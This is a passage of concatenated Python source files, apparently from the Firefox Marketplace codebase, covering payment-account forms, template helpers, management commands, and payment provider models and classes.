# l10n: SWIFT is http://bit.ly/15e7RJx and might not need translating.
max_length=20, label=_lazy(u'SWIFT code'))
bankName = forms.CharField(
max_length=50, label=_lazy(u'Bank Name'))
bankAddress1 = forms.CharField(
max_length=50, label=_lazy(u'Bank Address'))
bankAddress2 = forms.CharField(
max_length=50, required=False, label=_lazy(u'Bank Address 2'))
bankAddressCity = forms.CharField(
max_length=50, required=False, label=_lazy(u'Bank City/Municipality'))
bankAddressState = forms.CharField(
max_length=50, required=False,
label=_lazy(u'Bank State/Province/Region'))
bankAddressZipCode = forms.CharField(
max_length=10, label=_lazy(u'Bank Zip/Postal Code'))
bankAddressIso = forms.ChoiceField(
choices=BANGO_COUNTRIES, label=_lazy(u'Bank Country'))
account_name = forms.CharField(max_length=64, label=_lazy(u'Account Name'))
# These are the fields that Bango uses for bank details. They're read-only
# once written.
read_only_fields = set(['bankAccountPayeeName', 'bankAccountNumber',
'bankAccountCode', 'bankName', 'bankAddress1',
'bankAddressZipCode', 'bankAddressIso',
'adminEmailAddress', 'currencyIso',
'companyName'])
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(BangoPaymentAccountForm, self).__init__(*args, **kwargs)
if self.account:
# We don't need the bank account fields if we're getting
# modifications.
for field in self.fields:
if field in self.read_only_fields:
self.fields[field].required = False
def save(self):
# Save the account name, if it was updated.
self.account.get_provider().account_update(self.account,
self.cleaned_data)
class AccountListForm(happyforms.Form):
accounts = forms.ModelChoiceField(
queryset=PaymentAccount.objects.none(),
label=_lazy(u'Payment Account'), required=False)
def __init__(self, *args, **kwargs):
self.addon = kwargs.pop('addon')
self.provider = kwargs.pop('provider')
self.user = kwargs.pop('user')
super(AccountListForm, self).__init__(*args, **kwargs)
self.is_owner = None
if self.addon:
self.is_owner = self.addon.authors.filter(pk=self.user.pk,
addonuser__role=amo.AUTHOR_ROLE_OWNER).exists()
self.fields['accounts'].queryset = self.agreed_payment_accounts
if self.is_owner is False:
self.fields['accounts'].widget.attrs['disabled'] = ''
self.current_payment_account = None
try:
current_acct = AddonPaymentAccount.objects.get(
addon=self.addon,
payment_account__provider=self.provider.provider)
payment_account = PaymentAccount.objects.get(
uri=current_acct.account_uri)
# If this user owns this account then set initial otherwise
# we'll stash it on the form so we can display the non-owned
# current account separately.
if payment_account.user.pk == self.user.pk:
self.initial['accounts'] = payment_account
self.fields['accounts'].empty_label = None
else:
self.current_payment_account = payment_account
except (AddonPaymentAccount.DoesNotExist, PaymentAccount.DoesNotExist):
pass
@property
def payment_accounts(self):
queryset = (PaymentAccount.objects
.filter(inactive=False)
.filter(Q(user=self.user) | Q(shared=True))
.order_by('name', 'shared'))
if self.provider is not None:
queryset = queryset.filter(provider=self.provider.provider)
return queryset
@property
def agreed_payment_accounts(self):
return self.payment_accounts.filter(agreed_tos=True)
def has_accounts(self):
return self.payment_accounts.exists()
def has_completed_accounts(self):
return self.agreed_payment_accounts.exists()
def clean_accounts(self):
accounts = self.cleaned_data.get('accounts')
# When cleaned if the accounts field wasn't submitted or it's an empty
# string the cleaned value will be None for a ModelChoiceField.
# Therefore to tell the difference between the non-submission and the
# empty string we need to check the raw data.
accounts_submitted = 'accounts' in self.data
if (AddonPaymentAccount.objects.filter(addon=self.addon).exists() and
accounts_submitted and not accounts):
raise forms.ValidationError(
_('You cannot remove a payment account from an app.'))
if accounts and not self.is_owner:
raise forms.ValidationError(
_('You are not permitted to change payment accounts.'))
return accounts
def save(self):
if self.cleaned_data.get('accounts'):
try:
log.info('[1@%s] Deleting app payment account' % self.addon.pk)
AddonPaymentAccount.objects.get(
addon=self.addon,
payment_account__provider=self.provider.provider
).delete()
except AddonPaymentAccount.DoesNotExist:
pass
log.info('[1@%s] Creating new app payment account' % self.addon.pk)
account = self.cleaned_data['accounts']
uri = self.provider.product_create(account, self.addon)
AddonPaymentAccount.objects.create(
addon=self.addon, account_uri=account.uri,
payment_account=account, product_uri=uri)
# If the app is marked as paid and the information is complete
# and the app is currently marked as incomplete, put it into the
# re-review queue.
if (self.addon.status == amo.STATUS_NULL and
self.addon.highest_status in amo.WEBAPPS_APPROVED_STATUSES):
# FIXME: This might cause noise in the future if bank accounts
# get manually closed by Bango and we mark apps as STATUS_NULL
# until a new account is selected. That will trigger a
# re-review.
log.info(u'[Webapp:%s] (Re-review) Public app, premium type '
u'upgraded.' % self.addon)
RereviewQueue.flag(
self.addon, amo.LOG.REREVIEW_PREMIUM_TYPE_UPGRADE)
if (self.addon.has_incomplete_status() and
self.addon.is_fully_complete()):
_restore_app_status(self.addon)
class AccountListBaseFormSet(BaseFormSet):
"""Base FormSet for AccountListForm. Provide the extra data for the
AccountListForm as a list in `provider_data`.
Example:
formset = AccountListFormSet(provider_data=[
{'provider': Bango()}, {'provider': Boku()}])
"""
def __init__(self, **kwargs):
self.provider_data = kwargs.pop('provider_data', [])
super(AccountListBaseFormSet, self).__init__(**kwargs)
def _construct_form(self, i, **kwargs):
if i < len(self.provider_data):
_kwargs = self.provider_data[i]
else:
_kwargs = {}
_kwargs.update(kwargs)
return (super(AccountListBaseFormSet, self)
._construct_form(i, **_kwargs))
def save(self):
for form in self.forms:
form.save()
# Wrap the formset_factory call in a function so that extra/max_num works with
# different values of settings.PAYMENT_PROVIDERS in the tests.
def AccountListFormSet(*args, **kwargs):
provider_count = len(settings.PAYMENT_PROVIDERS)
current_form_set = formset_factory(AccountListForm,
formset=AccountListBaseFormSet,
extra=provider_count,
max_num=provider_count)
return current_form_set(*args, **kwargs)
class ReferenceAccountForm(happyforms.Form):
uuid = forms.CharField(max_length=36, required=False,
widget=forms.HiddenInput())
account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
name = forms.CharField(max_length=50, label=_lazy(u'Name'))
email = forms.CharField(max_length=50, label=_lazy(u'Email'))
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(ReferenceAccountForm, self).__init__(*args, **kwargs)
def save(self):
# Save the account name, if it was updated.
provider = self.account.get_provider()
provider.account_update(self.account, self.cleaned_data)
class BokuAccountForm(happyforms.Form):
signup_url = settings.BOKU_SIGNUP_URL
account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
# The lengths of these are not specified in the Boku documentation, so
# making a guess here about max lengths.
service_id = forms.CharField(max_length=50, label=_lazy(u'Service ID'))
def clean_service_id(self):
service_id = self.cleaned_data['service_id']
try:
client.api.boku.verify_service.post({'service_id': service_id})
except HttpClientError:
raise ValidationError(_('Service ID is not valid'))
else:
return service_id
class PaymentCheckForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=
Addon.objects.filter(premium_type__in=amo.ADDON_HAS_PAYMENTS,
type=amo.ADDON_WEBAPP),
sluggable_to_field_name='app_slug')
def clean_app(self):
app = self.cleaned_data['app']
if not app.has_payment_account():
raise ValidationError(_('No payment account set up for that app'))
return app
########NEW FILE########
__FILENAME__ = helpers
import datetime
import urllib
from collections import defaultdict
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
import chardet
import jinja2
from jingo import register
from jingo.helpers import datetime as jingo_datetime
from tower import ugettext as _, ungettext as ngettext
import amo
from access import acl
from addons.helpers import new_context
from mkt.site.helpers import mkt_breadcrumbs
register.function(acl.check_addon_ownership)
@register.inclusion_tag('developers/apps/listing/items.html')
@jinja2.contextfunction
def hub_addon_listing_items(context, addons, src=None, notes=None):
return new_context(**locals())
@register.function
@jinja2.contextfunction
def hub_page_title(context, title=None, addon=None):
"""Wrapper for developer page titles."""
if addon:
title = u'%s | %s' % (title, addon.name)
else:
devhub = _('Developers')
title = '%s | %s' % (title, devhub) if title else devhub
return mkt_page_title(context, title)
@register.function
@jinja2.contextfunction
def mkt_page_title(context, title, force_webapps=False):
title = smart_unicode(title)
base_title = _('Firefox Marketplace')
return u'%s | %s' % (title, base_title)
@register.function
@jinja2.contextfunction
def hub_breadcrumbs(context, addon=None, items=None, add_default=False):
"""
Wrapper function for ``breadcrumbs``. Prepends 'Developers' breadcrumb.
**items**
list of [(url, label)] to be inserted after Add-on.
**addon**
Adds the Add-on name to the end of the trail. If items are
specified then the Add-on will be linked.
**add_default**
Prepends trail back to home when True. Default is False.
**impala**
Whether to use the impala_breadcrumbs helper. Default is False.
"""
crumbs = [(reverse('ecosystem.landing'), _('Developers'))]
title = _('My Submissions')
link = reverse('mkt.developers.apps')
if addon:
if not addon and not items:
# We are at the end of the crumb trail.
crumbs.append((None, title))
else:
crumbs.append((link, title))
if items:
url = addon.get_dev_url()
else:
# The Addon is the end of the trail.
url = None
crumbs.append((url, addon.name))
if items:
crumbs.extend(items)
if len(crumbs) == 1:
crumbs = []
return mkt_breadcrumbs(context, items=crumbs)
@register.inclusion_tag('developers/versions/add_file_modal.html')
@jinja2.contextfunction
def add_file_modal(context, title, action, upload_url, action_label):
return new_context(modal_type='file', context=context, title=title,
action=action, upload_url=upload_url,
action_label=action_label)
@register.inclusion_tag('developers/versions/add_file_modal.html')
@jinja2.contextfunction
def add_version_modal(context, title, action, upload_url, action_label):
return new_context(modal_type='version', context=context, title=title,
action=action, upload_url=upload_url,
action_label=action_label)
@register.function
def status_choices(addon):
"""Return a dict like STATUS_CHOICES customized for the addon status."""
# Show "awaiting full review" for unreviewed files on that track.
choices = dict(amo.MKT_STATUS_CHOICES)
if addon.status in (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED,
amo.STATUS_PUBLIC):
choices[amo.STATUS_UNREVIEWED] = choices[amo.STATUS_NOMINATED]
return choices
@register.inclusion_tag('developers/versions/file_status_message.html')
def file_status_message(file, addon, file_history=False):
choices = status_choices(addon)
return {'fileid': file.id, 'platform': file.amo_platform.name,
'created': jingo_datetime(file.created),
'status': choices[file.status],
'file_history': file_history,
'actions': amo.LOG_REVIEW_EMAIL_USER,
'status_date': jingo_datetime(file.datestatuschanged)}
@register.function
def dev_files_status(files, addon):
"""Group files by their status (and files per status)."""
status_count = defaultdict(int)
choices = status_choices(addon)
for file in files:
status_count[file.status] += 1
return [(count, unicode(choices[status])) for
(status, count) in status_count.items()]
@register.function
def mkt_status_class(addon):
if addon.disabled_by_user and addon.status != amo.STATUS_DISABLED:
cls = 'disabled'
else:
cls = amo.STATUS_CHOICES_API.get(addon.status, 'none')
return 'status-' + cls
@register.function
def mkt_file_status_class(addon, version):
if addon.disabled_by_user and addon.status != amo.STATUS_DISABLED:
cls = 'disabled'
else:
file = version.all_files[0]
cls = amo.STATUS_CHOICES_API.get(file.status, 'none')
return 'status-' + cls
@register.function
def log_action_class(action_id):
if action_id in amo.LOG_BY_ID:
cls = amo.LOG_BY_ID[action_id].action_class
if cls is not None:
return 'action-' + cls
@register.function
def summarize_validation(validation):
"""Readable summary of add-on validation results."""
# L10n: first parameter is the number of errors
errors = ngettext('{0} error', '{0} errors',
validation.errors).format(validation.errors)
# L10n: first parameter is the number of warnings
warnings = ngettext('{0} warning', '{0} warnings',
validation.warnings).format(validation.warnings)
return "%s, %s" % (errors, warnings)
@register.filter
def display_url(url):
"""Display a URL like the browser URL bar would.
Note: returns a Unicode object, not a valid URL.
"""
if isinstance(url, unicode):
# Byte sequences will be url encoded so convert
# to bytes here just to stop auto decoding.
url = url.encode('utf8')
bytes = urllib.unquote(url)
c = chardet.detect(bytes)
return bytes.decode(c['encoding'], 'replace')
@register.function
def dev_agreement_ok(user):
latest = settings.DEV_AGREEMENT_LAST_UPDATED
if not latest:
# Value not set for last updated.
return True
if user.is_anonymous():
return True
if not user.read_dev_agreement:
# If you don't have any apps, we we won't worry about this because
# you'll be prompted on the first submission.
return True
current = user.read_dev_agreement
if current and current.date() < latest:
# The dev agreement has been updated since you last submitted.
return False
return True
@register.function
def passed_iarc_app_disable_date():
return datetime.datetime.now() > settings.IARC_APP_DISABLE_DATE
########NEW FILE########
__FILENAME__ = cleanup_addon_premium
from django.core.management.base import BaseCommand
import amo
from addons.models import AddonPremium
class Command(BaseCommand):
help = 'Clean up existing AddonPremium objects for free apps.'
def handle(self, *args, **options):
(AddonPremium.objects.filter(addon__premium_type__in=amo.ADDON_FREES)
.delete())
########NEW FILE########
__FILENAME__ = exclude_games
import logging
from django.core.management.base import BaseCommand
import amo
import mkt
log = logging.getLogger('z.task')
class Command(BaseCommand):
help = ('Exclude pre-IARC unrated public games in Brazil/Germany.')
def handle(self, *args, **options):
# Avoid import error.
from mkt.webapps.models import Geodata, Webapp
games = Webapp.objects.filter(
category__type=amo.ADDON_WEBAPP, category__slug='games',
status__in=(amo.STATUS_PUBLIC, amo.STATUS_PUBLIC_WAITING))
for app in games:
save = False
geodata, c = Geodata.objects.safer_get_or_create(addon=app)
# Germany.
if (not app.content_ratings.filter(
ratings_body=mkt.ratingsbodies.USK.id).exists()):
save = True
geodata.region_de_iarc_exclude = True
log.info('[App %s - %s] Excluded in region de'
% (app.pk, app.slug))
# Brazil.
if (not app.content_ratings.filter(
ratings_body=mkt.ratingsbodies.CLASSIND.id).exists()):
save = True
geodata.region_br_iarc_exclude = True
log.info('[App %s - %s] Excluded in region br'
% (app.pk, app.slug))
if save:
geodata.save()
########NEW FILE########
__FILENAME__ = exclude_region
import logging
from django.core.management.base import BaseCommand, CommandError
log = logging.getLogger('z.task')
class Command(BaseCommand):
help = ('Exclude apps in a given region. Syntax: \n'
' ./manage.py exclude_region <region_slug>')
def handle(self, *args, **options):
# Avoid import error.
from mkt.regions.utils import parse_region
from mkt.webapps.models import Webapp
try:
region_slug = args[0]
except IndexError:
raise CommandError(self.help)
region = parse_region(region_slug)
for app in Webapp.objects.all():
aer, created = app.addonexcludedregion.get_or_create(
region=region.id)
if created:
log.info('[App %s - %s] Excluded in region %r'
% (app.pk, app.slug, region.slug))
########NEW FILE########
__FILENAME__ = migrate_geodata
import logging
from django.core.management.base import BaseCommand
import amo
from mkt.constants.regions import (REGIONS_CHOICES_ID_DICT,
SPECIAL_REGION_IDS)
log = logging.getLogger('z.task')
class Command(BaseCommand):
"""
Backfill Webapp Geodata by inferring regional popularity from
AddonExcludedRegion objects (or lack thereof).
Remove AddonExcludedRegion objects for free apps.
"""
def handle(self, *args, **options):
from mkt.webapps.models import Webapp
paid_types = amo.ADDON_PREMIUMS + (amo.ADDON_FREE_INAPP,)
apps = Webapp.objects.all()
for app in apps:
# If it's already restricted, don't bother.
if app.geodata.restricted:
continue
geodata = {}
# If this app was excluded in every region except one,
# let's consider it regionally popular in that particular region.
region_ids = app.get_region_ids()
if len(region_ids) == 1:
geodata['popular_region'] = (
REGIONS_CHOICES_ID_DICT[region_ids[0]].slug
)
if app.premium_type in paid_types:
geodata['restricted'] = True
else:
exclusions = app.addonexcludedregion.exclude(
region__in=SPECIAL_REGION_IDS)
for exclusion in exclusions:
log.info('[App %s - %s] Removed exclusion: %s'
% (app.pk, app.slug, exclusion))
# Remove all other existing exclusions, since all apps
# are public in every region by default. If developers
# want to hard-restrict their apps they can now do that.
exclusion.delete()
app.geodata.update(**geodata)
########NEW FILE########
__FILENAME__ = populate_solitude_public_ids
from optparse import make_option
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from django.core.management.base import BaseCommand
from amo.utils import chunked
from mkt.developers.providers import Provider
from mkt.developers.utils import uri_to_pk
from mkt.webapps.models import Webapp
from mkt.webpay.utils import make_external_id
def get_generic_product(app):
if app.app_payment_accounts.exists():
for account in app.app_payment_accounts.all():
print (
'Looking up public_id for app '
'{app} using account {account}'
).format(
app=app,
account=account.payment_account.seller_uri)
try:
generic_product = Provider.generic.product.get_object(
seller=uri_to_pk(account.payment_account.seller_uri),
external_id=make_external_id(app))
print (
'Found generic product {product} for '
'app {app} using account {account}'
).format(
product=generic_product['public_id'],
app=app,
account=account)
return generic_product
except ObjectDoesNotExist:
pass
except MultipleObjectsReturned:
print 'Found multiple generic products for app {app}'.format(
app=app)
print 'Unable to find a generic product for app {app}'.format(app=app)
class Command(BaseCommand):
help = ('Look up and store the Generic Product public_ids'
' for existing webapps with configured payment accounts.')
option_list = BaseCommand.option_list + (
make_option(
'--dry-run',
default=False,
action='store_true',
dest='dry_run',
help='Look up the public_ids in Solitude without saving'),)
def handle(self, *args, **options):
webapps = (Webapp.objects.filter(app_payment_accounts__isnull=False)
.no_transforms()
.select_related('app_payment_accounts'))
for chunk in chunked(webapps, 50):
for app in chunk:
generic_product = get_generic_product(app)
if not generic_product:
continue
print 'Found public_id', generic_product['public_id']
if not options['dry_run']:
print 'Saving app', app
app.solitude_public_id = generic_product['public_id']
app.save()
########NEW FILE########
__FILENAME__ = refresh_iarc_ratings
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from amo.utils import chunked
from mkt.developers.tasks import refresh_iarc_ratings
log = logging.getLogger('z.task')
class Command(BaseCommand):
"""
Refresh old or corrupt IARC ratings by re-fetching the certificate.
"""
option_list = BaseCommand.option_list + (
make_option('--apps',
help='Webapp ids to process. Use commas to separate '
'multiple ids.'),
)
help = __doc__
def handle(self, *args, **kw):
from mkt.webapps.models import Webapp
# Get apps.
apps = Webapp.objects.filter(iarc_info__isnull=False)
ids = kw.get('apps')
if ids:
apps = apps.filter(
id__in=(int(id.strip()) for id in ids.split(',')))
for chunk in chunked(apps.values_list('id', flat=True), 100):
refresh_iarc_ratings.delay(chunk)
########NEW FILE########
__FILENAME__ = refresh_wsdl
import os
from django.conf import settings
from django.core.management.base import BaseCommand
import requests
root = os.path.join(settings.ROOT, 'lib', 'iarc', 'wsdl')
sources = {
'prod': [
('https://www.globalratings.com/iarcprodservice/iarcservices.svc?wsdl',
'iarc_services.wsdl'),
],
'test': [
('https://www.globalratings.com/iarcdemoservice/iarcservices.svc?wsdl',
'iarc_services.wsdl'),
]
}
class Command(BaseCommand):
help = 'Refresh the WSDLs.'
def handle(self, *args, **kw):
for dir, paths in sources.items():
for src, filename in paths:
dest = os.path.join(root, dir, filename)
top = os.path.dirname(dest)
if not os.path.exists(top):
os.makedirs(top)
print 'Getting', src
open(dest, 'w').write(requests.get(src).text)
print '...written to', dest
########NEW FILE########
__FILENAME__ = remove_old_aers
import logging
from django.core.management.base import BaseCommand
import amo
from amo.decorators import write
from mkt import regions
log = logging.getLogger('z.task')
class Command(BaseCommand):
help = ('Remove game-related AERs for Brazil + Germany.')
@write
def handle(self, *args, **options):
# Avoid import error.
from mkt.webapps.models import Webapp
games = Webapp.objects.filter(
category__type=amo.ADDON_WEBAPP, category__slug='games')
for app in games:
aers = app.addonexcludedregion
if (aers.count() == 2 and
aers.filter(region=regions.BR.id).exists() and
aers.filter(region=regions.DE.id).exists()):
log.info('Removing BR/DE AERs for %s' % app.id)
aers.all().delete()
########NEW FILE########
__FILENAME__ = requeue_uploads
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Requeue any stranded add-on uploads after restarting Rabbit."
def handle(self, *args, **options):
from files.models import FileUpload
from mkt.developers import tasks
qs = FileUpload.objects.filter(task_error=None, validation=None)
pks = qs.values_list('pk', flat=True)
print 'Restarting %s tasks.' % len(pks)
for pk in pks:
tasks.validator.delay(pk)
########NEW FILE########
__FILENAME__ = models
import posixpath
import uuid
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
import commonware.log
from tower import ugettext as _
import amo
from constants.payments import PROVIDER_BANGO, PROVIDER_CHOICES
from lib.crypto import generate_key
from lib.pay_server import client
from mkt.constants.payments import ACCESS_SIMULATE
from users.models import UserForeignKey
log = commonware.log.getLogger('z.devhub')
class CantCancel(Exception):
pass
class SolitudeSeller(amo.models.ModelBase):
# TODO: When Solitude allows for it, this should be updated to be 1:1 with
# users.
user = UserForeignKey()
uuid = models.CharField(max_length=255, unique=True)
resource_uri = models.CharField(max_length=255)
class Meta:
db_table = 'payments_seller'
@classmethod
def create(cls, user):
uuid_ = str(uuid.uuid4())
res = client.api.generic.seller.post(data={'uuid': uuid_})
uri = res['resource_uri']
obj = cls.objects.create(user=user, uuid=uuid_, resource_uri=uri)
log.info('[User:%s] Created Solitude seller (uuid:%s)' %
(user, uuid_))
return obj
class PaymentAccount(amo.models.ModelBase):
user = UserForeignKey()
name = models.CharField(max_length=64)
agreed_tos = models.BooleanField(default=False)
solitude_seller = models.ForeignKey(SolitudeSeller)
# These two fields can go away when we're not 1:1 with SolitudeSellers.
seller_uri = models.CharField(max_length=255, unique=True)
uri = models.CharField(max_length=255, unique=True)
# A soft-delete so we can talk to Solitude asynchronously.
inactive = models.BooleanField(default=False)
# The id for this account from the provider.
account_id = models.CharField(max_length=255)
# Each account will be for a particular provider.
provider = models.IntegerField(choices=PROVIDER_CHOICES,
default=PROVIDER_BANGO)
shared = models.BooleanField(default=False)
class Meta:
db_table = 'payment_accounts'
unique_together = ('user', 'uri')
def cancel(self, disable_refs=False):
"""Cancels the payment account.
If `disable_refs` is set, existing apps that use this payment account
will be set to STATUS_NULL.
"""
account_refs = AddonPaymentAccount.objects.filter(account_uri=self.uri)
if self.shared and account_refs:
# With sharing a payment account comes great responsibility. It
# would be really mean to create a payment account, share it
# and have lots of apps use it. Then one day you remove it and
# make a whole pile of apps in the marketplace get removed from
# the store, or have in-app payments fail.
#
# For the moment I'm just stopping this completely, if this ever
# happens, we'll have to go through a deprecation phase.
# - let all the apps that use it know
# - when they have all stopped sharing it
# - re-run this
log.error('Cannot cancel a shared payment account that has '
'apps using it.')
raise CantCancel('You cannot cancel a shared payment account.')
self.update(inactive=True)
log.info('Soft-deleted payment account (uri: %s)' % self.uri)
for acc_ref in account_refs:
if (disable_refs and
not acc_ref.addon.has_multiple_payment_accounts()):
log.info('Changing app status to NULL for app: {0}'
'because of payment account deletion'.format(
acc_ref.addon_id))
acc_ref.addon.update(status=amo.STATUS_NULL)
log.info('Deleting AddonPaymentAccount for app: {0} because of '
'payment account deletion'.format(acc_ref.addon_id))
acc_ref.delete()
def get_provider(self):
"""Returns an instance of the payment provider for this account."""
# TODO: fix circular import. Providers imports models which imports
# forms which imports models.
from mkt.developers.providers import get_provider
return get_provider(id=self.provider)
def __unicode__(self):
date = self.created.strftime('%m/%y')
if not self.shared:
return u'%s - %s' % (date, self.name)
# L10n: {0} is the name of the account.
return _(u'Shared Account: {0}'.format(self.name))
def get_agreement_url(self):
return reverse('mkt.developers.provider.agreement', args=[self.pk])
class AddonPaymentAccount(amo.models.ModelBase):
addon = models.ForeignKey(
'addons.Addon', related_name='app_payment_accounts')
payment_account = models.ForeignKey(PaymentAccount)
account_uri = models.CharField(max_length=255)
product_uri = models.CharField(max_length=255, unique=True)
class Meta:
db_table = 'addon_payment_account'
@property
def user(self):
return self.payment_account.user
class UserInappKey(amo.models.ModelBase):
solitude_seller = models.ForeignKey(SolitudeSeller)
seller_product_pk = models.IntegerField(unique=True)
def secret(self):
return self._product().get()['secret']
def public_id(self):
return self._product().get()['public_id']
def reset(self):
self._product().patch(data={'secret': generate_key(48)})
@classmethod
def create(cls, user):
sel = SolitudeSeller.create(user)
# Create a product key that can only be used for simulated purchases.
prod = client.api.generic.product.post(data={
'seller': sel.resource_uri, 'secret': generate_key(48),
'external_id': str(uuid.uuid4()), 'public_id': str(uuid.uuid4()),
'access': ACCESS_SIMULATE,
})
log.info(u'User %s created an in-app payments dev key product=%s '
u'with %s' % (unicode(user), prod['resource_pk'], sel))
return cls.objects.create(solitude_seller=sel,
seller_product_pk=prod['resource_pk'])
def _product(self):
return client.api.generic.product(self.seller_product_pk)
class Meta:
db_table = 'user_inapp_keys'
class PreloadTestPlan(amo.models.ModelBase):
addon = models.ForeignKey('addons.Addon')
last_submission = models.DateTimeField(auto_now_add=True)
filename = models.CharField(max_length=60)
status = models.PositiveSmallIntegerField(default=amo.STATUS_PUBLIC)
class Meta:
db_table = 'preload_test_plans'
ordering = ['-last_submission']
@property
def preload_test_plan_url(self):
host = (settings.PRIVATE_MIRROR_URL if self.addon.is_disabled
else settings.LOCAL_MIRROR_URL)
return posixpath.join(host, str(self.addon.id), self.filename)
########NEW FILE########
__FILENAME__ = providers
import os
import uuid
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.core.urlresolvers import reverse
import bleach
import commonware
from curling.lib import HttpClientError
from tower import ugettext_lazy as _
from constants.payments import (PROVIDER_BANGO, PROVIDER_BOKU,
PROVIDER_REFERENCE)
from lib.crypto import generate_key
# Because client is used in the classes, renaming here for clarity.
from lib.pay_server import client as pay_client
from mkt.constants.payments import ACCESS_PURCHASE
from mkt.developers import forms_payments
from mkt.developers.models import PaymentAccount, SolitudeSeller
from mkt.developers.utils import uri_to_pk
from mkt.webpay.utils import make_external_id
root = 'developers/payments/includes/'
log = commonware.log.getLogger('z.devhub.providers')
def account_check(f):
"""
Use this decorator on Provider methods to ensure that the account
being passed into the method belongs to that provider.
"""
def wrapper(self, *args, **kwargs):
for arg in args:
if (isinstance(arg, PaymentAccount)
and arg.provider != self.provider):
raise ValueError('Wrong account {0} != {1}'
.format(arg.provider, self.provider))
return f(self, *args, **kwargs)
return wrapper
class Provider(object):
generic = pay_client.api.generic
def account_create(self, user, form_data):
raise NotImplementedError
@account_check
def account_retrieve(self, account):
raise NotImplementedError
@account_check
def account_update(self, account, form_data):
raise NotImplementedError
@account_check
def get_or_create_public_id(self, app):
"""
Returns the Solitude public_id for this app if set
otherwise creates one
"""
if app.solitude_public_id is None:
app.solitude_public_id = str(uuid.uuid4())
app.save()
return app.solitude_public_id
@account_check
def get_or_create_generic_product(self, app, secret=None):
product_data = {
'public_id': self.get_or_create_public_id(app),
}
try:
generic = self.generic.product.get_object_or_404(**product_data)
except ObjectDoesNotExist:
seller_uuid = str(uuid.uuid4())
seller = self.generic.seller.post(data={'uuid': seller_uuid})
log.info(
'Creating a new Generic Solitude '
'Seller {seller_uuid} for app {app}'.format(
seller_uuid=seller_uuid,
app=app,
)
)
product_data.update({
'external_id': make_external_id(app),
'seller': seller['resource_uri'],
'secret': secret or generate_key(48),
'access': ACCESS_PURCHASE,
})
generic = self.generic.product.post(data=product_data)
log.info(
'Creating a new Generic Solitude Product '
'{public_id} for app {app}'.format(
public_id=product_data['public_id'],
app=app,
)
)
return generic
@account_check
def product_create(self, account, app, secret):
raise NotImplementedError
def setup_seller(self, user):
log.info('[User:{0}] Creating seller'.format(user.pk))
return SolitudeSeller.create(user)
def setup_account(self, **kw):
log.info('[User:{0}] Created payment account (uri: {1})'
.format(kw['user'].pk, kw['uri']))
kw.update({'seller_uri': kw['solitude_seller'].resource_uri,
'provider': self.provider})
return PaymentAccount.objects.create(**kw)
@account_check
def terms_create(self, account):
raise NotImplementedError
@account_check
def terms_retrieve(self, account):
raise NotImplementedError
def get_portal_url(self, app_slug=None):
"""
Return a URL to the payment provider's portal.
The URL can be an empty string if the provider
doesn't have a portal.
"""
return ''
class Bango(Provider):
"""
The special Bango implementation.
"""
bank_values = (
'seller_bango', 'bankAccountPayeeName', 'bankAccountNumber',
'bankAccountCode', 'bankName', 'bankAddress1', 'bankAddress2',
'bankAddressZipCode', 'bankAddressIso'
)
client = pay_client.api.bango
# This is at the new provider API.
client_provider = pay_client.api.provider.bango
forms = {
'account': forms_payments.BangoPaymentAccountForm,
}
full = 'Bango'
name = 'bango'
package_values = (
'adminEmailAddress', 'supportEmailAddress', 'financeEmailAddress',
'paypalEmailAddress', 'vendorName', 'companyName', 'address1',
'address2', 'addressCity', 'addressState', 'addressZipCode',
'addressPhone', 'countryIso', 'currencyIso', 'vatNumber'
)
provider = PROVIDER_BANGO
templates = {
'add': os.path.join(root, 'add_payment_account_bango.html'),
'edit': os.path.join(root, 'edit_payment_account_bango.html'),
}
def account_create(self, user, form_data):
# Get the seller object.
user_seller = self.setup_seller(user)
# Get the data together for the package creation.
package_values = dict((k, v) for k, v in form_data.items() if
k in self.package_values)
# Dummy value since we don't really use this.
package_values.setdefault('paypalEmailAddress', '[email protected]')
package_values['seller'] = user_seller.resource_uri
log.info('[User:%s] Creating Bango package' % user)
res = self.client.package.post(data=package_values)
uri = res['resource_uri']
# Get the data together for the bank details creation.
bank_details_values = dict((k, v) for k, v in form_data.items() if
k in self.bank_values)
bank_details_values['seller_bango'] = uri
log.info('[User:%s] Creating Bango bank details' % user)
self.client.bank.post(data=bank_details_values)
return self.setup_account(user=user,
uri=res['resource_uri'],
solitude_seller=user_seller,
account_id=res['package_id'],
name=form_data['account_name'])
@account_check
def account_retrieve(self, account):
data = {'account_name': account.name}
package_data = (self.client.package(uri_to_pk(account.uri))
.get(data={'full': True}))
data.update((k, v) for k, v in package_data.get('full').items() if
k in self.package_values)
return data
@account_check
def account_update(self, account, form_data):
account.update(name=form_data.pop('account_name'))
self.client.api.by_url(account.uri).patch(
data=dict((k, v) for k, v in form_data.items() if
k in self.package_values))
@account_check
def product_create(self, account, app):
secret = generate_key(48)
generic = self.get_or_create_generic_product(app, secret=secret)
product_uri = generic['resource_uri']
data = {'seller_product': uri_to_pk(product_uri)}
# There are specific models in solitude for Bango details.
# These are SellerBango and SellerProductBango that store Bango
# details such as the Bango Number.
#
# Solitude calls Bango to set up whatever it needs.
try:
res = self.client.product.get_object_or_404(**data)
except ObjectDoesNotExist:
# The product does not exist in Solitude so create it.
res = self.client_provider.product.post(data={
'seller_bango': account.uri,
'seller_product': product_uri,
'name': unicode(app.name),
'packageId': account.account_id,
'categoryId': 1,
'secret': secret
})
return res['resource_uri']
@account_check
def terms_update(self, account):
package = self.client.package(account.uri).get_object_or_404()
account.update(agreed_tos=True)
return self.client.sbi.post(data={
'seller_bango': package['resource_uri']})
@account_check
def terms_retrieve(self, account):
package = self.client.package(account.uri).get_object_or_404()
res = self.client.sbi.agreement.get_object(data={
'seller_bango': package['resource_uri']})
if 'text' in res:
res['text'] = bleach.clean(res['text'], tags=['h3', 'h4', 'br',
'p', 'hr'])
return res
def get_portal_url(self, app_slug=None):
